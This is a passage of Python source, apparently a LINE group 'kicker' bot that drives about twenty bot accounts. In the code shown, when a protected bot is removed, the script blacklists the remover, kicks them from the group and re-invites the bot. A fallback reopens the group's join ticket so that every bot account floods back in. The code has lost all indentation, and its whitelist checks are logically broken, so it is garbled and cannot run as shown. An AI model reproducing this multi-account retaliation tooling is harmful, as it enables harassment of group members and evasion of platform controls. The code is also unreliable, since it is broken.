kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
pass
return
if Emid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
pass
return
if Fmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
pass
return
if Gmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
pass
return
if Hmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
pass
return
if Imid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
pass
return
if ga1 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
